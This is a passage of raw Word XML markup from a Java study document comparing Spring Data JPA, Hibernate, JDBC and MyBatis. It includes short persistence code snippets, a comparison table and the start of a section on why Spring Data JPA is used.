    <w:p w14:paraId="30A9E43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HQL (Hibernate Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is similar to SQL but works with objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4379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grates easily with Spring Data JPA for a higher-level abstraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F67FFE"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andles </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and manages </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entity states</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998F3B7"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When to Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA7A8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ORM capabilities with fine control over the mapping between Java objects and database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CAD4EC"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aching, lazy loading, and other advanced ORM features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5739C6"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6504B2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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160ED1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able(name = "employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E73785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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCB9A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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA6AB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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DF4A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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EBD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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA390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F2AE1E5"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AFB70">
          <v:rect id="_x0000_i2128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28B693"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JDBC (Java Database Connectivity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F121EE"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511EFDA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Works directly with </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ResultSet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PreparedStatements</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6897A"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No abstraction layer, meaning the developer must handle connections, error handling, and result mapping manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904C692"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Offers complete control over SQL queries, but can lead to a lot of boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174279D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without needing any ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4862A0"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2FFC7F3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control over your SQL queries and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A890B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prefer not to use ORM or need to interact with databases in a non-ORM way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C5418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76FD1F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void getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D645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ring sql = "SELECT * FROM employees WHERE id = ?";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32321A8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ry (Connection conn = DriverManager.getConnection(DB_URL, USER, PASS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47305BC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eparedStatement stmt = conn.prepareStatement(sql)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E882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AF9772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mt.setLong(1, id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E49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sultSet rs = stmt.executeQuery();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F339E1B"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hile (rs.next()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4564F9"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Map result to Employee object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F854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6E84F4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atch (SQLException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39354A6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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7335F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7AE93C0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0B1FFA9"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CB954">
          <v:rect id="_x0000_i2129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9EC1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MyBatis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3AF5C"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MyBatis is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>persistence framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides a middle ground between raw JDBC and full ORM frameworks like Hibernate. It uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than object mapping, giving you more control over SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB3750"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0385B835"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ps SQL queries to Java methods using XML or annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF868F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Allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual control</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of SQL queries and mappings between SQL results and Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF05BF"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nlike JPA/Hibernate, it doesn’t abstract SQL but helps with simplifying the boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC5790"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upports complex SQL queries with dynamic SQL generation and offers a finer level of control compared to JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE80DB9"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376346F4"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ontrol over SQL queries but want to avoid the verbosity of JDBC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5C2D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dynamic or complex SQL queries that are difficult to express in JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FFDBB"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C25CA1F"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lt;select id="findByName" resultType="Employee"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7E346"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ELECT * FROM employees WHERE name = #{name}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66D05D"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select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26547B1E"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List&lt;Employee&gt; findByName(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12040724"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E837C">
          <v:rect id="_x0000_i2130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92B05E"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302"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="1852"/>
        <w:gridCol w:w="2062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="4BF12591" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7984DA24"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78B188A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pring Data JPA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD4F00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Hibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D09D3C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JDBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0F3856"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MyBatis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="3C3C2CAA" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3AFBE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bstraction Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ADF7B2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level abstraction (JPA-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8563A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ORM framework (JPA implementation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A4D1C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level API for direct SQL interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5D100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id-level (SQL mapping with more control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="54451ED4" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8A4D0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QL Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BAB6A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 with method names (via Spring Data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CFDF0B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HQL (Hibernate Query Language) or native SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5508AAB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nual SQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48893F10"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XML or annotations for SQL mappings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="28F47316" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABC98E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earning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3043F4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 (easy to use with Spring)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A0A66A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requires knowledge of ORM concepts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C11A1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 (requires manual handling of SQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B7F2D2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manual SQL but easier than raw JDBC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="143A51FC" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EFC9C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plex Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1C35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done with JPQL, but automatic queries are limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B402C48"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owerful support for complex queries and caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47EFA4D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queries but more boilerplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F94A2E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complex queries, dynamic SQL generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="0AFAE4BC" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C67F0C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ransaction Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A8C35D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automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FFB54F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Hibernate (via JPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77F8A22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manually by the developer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1872E65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or the developer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="451AEE17" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5625A6F5"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D82FAB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RUD operations with minimal setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D9260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dvanced ORM needs (e.g., lazy loading, caching)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3994DBF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SQL execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC6A0F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mplified SQL mapping, dynamic query generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="352CBC93"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072031">
          <v:rect id="_x0000_i2131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B338A"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 Which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004EA55"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Use when you want a high-level abstraction, minimal boilerplate, and are working in a Spring-based environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E975E"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Use when you need a full-fledged ORM, and you're okay with handling complex ORM scenarios with automatic query generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21DED8"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Use when you need fine control over SQL queries or need to work with legacy databases without ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706EDB4F"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Use when you need to manage complex or dynamic SQL queries while still having some level of abstraction over JDBC. It’s a good middle ground between JDBC and full ORM frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0538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ach of these technologies has its strengths, and the choice depends on the project requirements, team preferences, and the level of control needed over database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE1F18" w14:textId="528BB103"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32" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3F8D7" w14:textId="1557D959" w:rsidR="00F618CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F618CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc197867680"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why do we use Spring data JPA?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w14:paraId="237524FD" w14:textId="03F61B10" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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We use </w:t>
      </w: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because it significantly simplifies database interaction in Java applications, especially when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 Simplifies Data Access Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFDA1C2" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192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2. Repository Pattern Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5CC823"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roduces the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Repository pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where interfaces like JpaRepository, CrudRepository, or PagingAndSortingRepository can be extended to easily interact with the database without writing explicit queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176C965"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se repositories handle most of the CRUD operations automatically, making it easier to manage entities and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751909FF"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3. Automatic Query Generation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA16176"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One of the main benefits of Spring Data JPA is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic query generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on method names. For example, a method like findByName() will automatically generate the correct query to search for records with the given name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3624E660"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is reduces the need for writing boilerplate queries manually, saving development time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6C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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1C15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2D82188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2F45759"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4. Custom Queries with JPQL or Native SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7DCC8"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allows you to define custom queries using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</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native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can write more complex queries when needed, while still benefiting from the abstraction provided by Spring Data JPA.</w:t>
      </w:r>
    </w:p>
